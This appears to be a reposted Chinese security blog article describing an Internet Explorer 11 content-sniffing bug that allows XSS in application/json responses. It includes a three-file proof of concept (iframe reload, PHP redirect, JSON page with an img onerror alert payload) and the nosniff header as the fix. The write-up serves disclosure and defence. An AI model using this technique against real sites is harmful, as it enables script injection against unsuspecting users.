JSON

在application/json,application/javascript等Response下进行XSS

字号+ 作者:H5之家 来源:H5之家 2016-12-30 18:01 我要评论( )

IT学习网 - 最具影响力综合资讯网站,为用户提供全方位最好最新的报道,各个方面的信息,努力将IT学习网做的更好!

via:Mramydnei

前不久在日本比较著名的XSS会议ShibuyaXSS上,著名漏洞猎人,Cure53成员Masato kinugawa
在会议上分享了个比较有趣的Internet Explorer的BUG。借助该BUG可以在application
/xx的response下优雅的完成XSS攻击。

POC.htm

<meta charset=utf-8> <iframe id=x src=redirect.php></iframe> <script> x.location.reload(); </script>

redirect.php

<?php header("location: json.php"); ?>

json.php

<?php header("Content-Type: application/json"); ?> <img src=x onerror=alert(1)>

测试于Windows7/Internet Explorer 11

解决方案:
设置X-Content-Type-Options头 -> header(‘X-Content-Type-Options: nosniff’);


在application/json,application/javascript等Response下进行XSS
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:

标签分类:

上一篇:上一篇:关于安全服务模型的一些思考
下一篇: 下一篇:没有了

 

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 解析错误富文本json字符串(带双引号)的快速解决方法

    解析错误富文本json字符串(带双引号)的快速解决方法

    2016-08-27 12:00

  • 基于jQuery的AJAX和JSON实现纯html数据模板

    基于jQuery的AJAX和JSON实现纯html数据模板

    2016-08-21 13:02

  • 详解Mysql中的JSON系列操作函数

    详解Mysql中的JSON系列操作函数

    2016-08-16 16:00

  • Java的JSON处理器fastjson使用方法详解

    Java的JSON处理器fastjson使用方法详解

    2016-08-15 17:00

网友点评
l